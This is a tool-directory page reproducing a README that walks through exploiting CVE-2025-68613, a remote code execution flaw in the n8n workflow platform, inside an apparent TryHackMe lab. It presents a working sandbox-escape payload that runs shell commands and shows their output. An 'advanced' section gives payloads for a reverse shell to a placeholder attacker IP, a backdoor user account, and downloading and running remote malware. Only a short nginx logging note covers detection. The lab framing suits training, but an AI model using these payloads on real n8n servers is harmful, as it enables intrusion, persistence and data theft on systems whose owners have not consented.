Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
n8n-cve-2025-68613-thm — Educational walkthrough for exploiting CVE-2025-68613, a critical RCE in n8n workflow automation. Covers expression injection, sandbox escape, payload development, and detection strategies via a TryHackMe lab. | Kitploit
Tools/GitHubGitHub/khin-96/n8n-cve-2025-68613-thm
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationCommand and ControlLearning & EducationIncident ResponsePayload DevelopmentLabs & Practice

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
GitHubkhin-96/n8n-cve-2025-68613-thm

n8n-cve-2025-68613-thm

Educational walkthrough for exploiting CVE-2025-68613, a critical RCE in n8n workflow automation. Covers expression injection, sandbox escape, payload development, and detection strategies via a TryHackMe lab.

View Repository
1119 months agoNot yet reviewed

CVE-2025-68613 – n8n Critical RCE Exploitation

Overview

This repository documents a hands-on exploitation of CVE-2025-68613 (CVSS 9.9), a critical Remote Code Execution vulnerability affecting the n8n workflow automation platform (versions 0.211.0 through 1.120.3).

This exploitation was performed ethically in a controlled TryHackMe lab environment for educational purposes only.


Vulnerability Summary

FieldValue
CVE IDCVE-2025-68613
CVSS Score9.9 (Critical)
PublishedDecember 19, 2025
Affected Productn8n Workflow Automation Platform
Vulnerability TypeExpression Injection → Sandbox Escape → RCE
Attack VectorAuthenticated User (Default)
Patched Versions1.120.4, 1.121.1, 1.122.0+
Affected Versions0.211.0 - 1.120.3

What is n8n?

n8n is an open-source workflow automation platform that allows users to visually connect applications and services for task automation. It features:

  • Node-based workflow architecture: Each node represents an action (API request, data processing, email, etc.)
  • 400+ native integrations: Pre-built connectors to various APIs and services
  • Code nodes: Custom JavaScript or Python code execution
  • Expression evaluation: Dynamic expressions wrapped in {{ }} evaluated as JavaScript

Deployment Models

  • Self-hosted instances (on-premises or private cloud)
  • Cloud-hosted (n8n.cloud) managed service
  • Internal automation tools within corporate networks

Technical Background

The Vulnerability Chain

The vulnerability resides in n8n's workflow expression evaluation system. When authenticated users configure workflows, their input is processed as JavaScript code without adequate sandboxing.

Context Escalation Chain

Expression Sandbox
    ↓ (escape via 'this')
Node.js Global Context
    ↓ (access mainModule)
Module System (require)
    ↓ (load child_process)
System Command Execution

Key Flaws

  1. Insecure Expression Evaluation: User expressions wrapped in {{ }} are evaluated as raw JavaScript without proper context isolation
  2. Sandbox Escape: Access to this object allows escape from intended sandbox restrictions
  3. Unrestricted Module Access: process.mainModule.require() provides access to Node.js module system
  4. Dangerous Module Loading: Can load child_process module for system command execution
  5. No Meaningful Authentication Protection: Any authenticated user can exploit the vulnerability

Exploit Payload Breakdown

(function(){ 
  return this.process.mainModule.require('child_process').execSync('COMMAND').toString() 
})()

Explanation:

  • this → Node.js global object
  • this.process → Node.js process object
  • process.mainModule → Root module of n8n application
  • .require('child_process') → Load system command execution module
  • .execSync('COMMAND') → Execute shell command synchronously
  • .toString() → Convert Buffer output to readable string

Exploitation Walkthrough

Step 1: Authentication

Access the vulnerable n8n instance and log in with valid credentials.

Lab Credentials:

  • Email: [email protected]
  • Password: Try12345!

Login Screen


Step 2: Welcome & Workflow Creation

After login, you're presented with the workflow creation interface. Click "Start from scratch" to begin a new workflow.

Welcome Screen


Step 3: Add Manual Trigger

Click "Add first step" and search for "Manual Trigger". This node serves as the entry point for workflow execution.

Manual Trigger Setup

Purpose: The Manual Trigger node allows manual execution of the workflow via the "Execute workflow" button in the UI, making it ideal for testing.


Step 4: Configure Workflow & Add Field Mapping

Add an "Edit Fields" node to perform field mapping. This is where the vulnerability is exploited.

Workflow Configuration

Configuration Steps:

  1. Click "Add field" to add a new field mapping
  2. Set the mode to "Expression"
  3. This allows JavaScript code evaluation

Step 5: Execute ID Command

Inject the payload to execute the id command and retrieve user/privilege information.

Payload:

(function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })()

Result:

uid=1000(node) gid=1000(node) groups=1000(node)

ID Command Execution

Information Gathered:

  • Running as non-root user (uid=1000)
  • Group membership (gid=1000)
  • Potential privilege escalation paths

Step 6: Enumerate File System with LS

Modify the payload to execute ls command and list directory contents.

Payload:

(function(){ return this.process.mainModule.require('child_process').execSync('ls -la').toString() })()

LS Command Execution

Output Shows:

  • Flag file present: flag.txt
  • Directory structure and file permissions
  • Additional reconnaissance data

Step 7: Extract Sensitive Data

Read the flag file using cat command to complete the exploitation.

Payload:

(function(){ return this.process.mainModule.require('child_process').execSync('cat flag.txt').toString() })()

Flag Retrieved:

THM{n8n_exposed_workflow}

Flag Extraction


Advanced Exploitation Techniques

1. Reverse Shell

Establish interactive shell access for persistent control:

(function(){ 
  return this.process.mainModule.require('child_process').execSync('bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1').toString() 
})()

2. Create Backdoor User

Add a new system user for persistent access:

(function(){ 
  return this.process.mainModule.require('child_process').execSync('useradd -m -p $(openssl passwd -1 PASSWORD) backdoor').toString() 
})()

3. Download Malicious Payload

Fetch and execute remote code:

(function(){ 
  return this.process.mainModule.require('child_process').execSync('wget http://attacker.com/malware.sh -O /tmp/malware.sh && bash /tmp/malware.sh').toString() 
})()

4. Privilege Escalation Enumeration

Check for sudo privileges:

(function(){ 
  return this.process.mainModule.require('child_process').execSync('sudo -l').toString() 
})()

5. Environment Reconnaissance

Extract environment variables:

(function(){ 
  return this.process.mainModule.require('child_process').execSync('env').toString() 
})()

Detection Strategies

Web Proxy Logging (Nginx)

Configure your proxy to log request bodies for analysis:

http {
    log_format detailed '$remote_addr - $remote_user [$time_local] '
                       '"$request" $status $body_bytes_sent '
                       '"$http_referer" "$http_user_agent" '
                       'Request-Body: "$request_body" '
                       'Duration: $request_time s';
    
    access_log /var/log/nginx/detailed_access.log detailed;
}
Download Tool